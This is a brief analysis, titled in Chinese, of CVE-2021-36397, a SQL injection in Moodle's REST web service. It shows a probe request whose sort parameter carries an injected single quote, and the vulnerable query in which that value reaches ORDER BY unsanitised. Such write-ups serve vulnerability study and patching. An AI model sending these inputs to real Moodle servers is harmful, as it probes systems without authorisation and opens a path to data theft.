CVE-2021-36397 Moodle REST Web服务接口SQL漏洞分析之二

/moodle/webservice/rest/server.php?wstoken=***&wsfunction=core_course_get_recent_courses&sort=123'...

SELECT c.id,idnumber,summary,summaryformat,startdate,enddate,category,shortname,fullname,timeaccess,component,visible,showactivitydates,showcompletionconditions, ctx.id AS ctxid, ctx.path AS ctxpath, ctx.depth AS ctxdepth, ctx.contextlevel AS ctxlevel, ctx.instanceid AS ctxinstance, ctx.locked AS ctxlocked              FROM {course} c              JOIN {context} ctx                   ON ctx.contextlevel = :contextlevel                   AND ctx.instanceid = c.id              JOIN {user_lastaccess} ul                   ON ul.courseid = c.id             LEFT JOIN {favourite} fav                        ON fav.component = :favouritecomponent                       AND fav.itemtype = :favouriteitemtype                       AND fav.userid = 2                       AND fav.itemid = ul.courseid          LEFT JOIN {enrol} eg ON eg.courseid = c.id AND eg.status = :statusenrolg AND eg.enrol = :guestenrol             WHERE ul.userid = :userid               AND c.visible = :visible               AND (eg.id IS NOT NULL                    OR EXISTS (SELECT e.id                             FROM {enrol} e                             JOIN {user_enrolments} ue ON ue.enrolid = e.id                            WHERE e.courseid = c.id                              AND e.status = :statusenrol                              AND ue.status = :status                              AND ue.userid = :userid2                              AND ue.timestart < :now1                              AND (ue.timeend = 0 OR ue.timeend > :now2)                          ))            ORDER BY 123'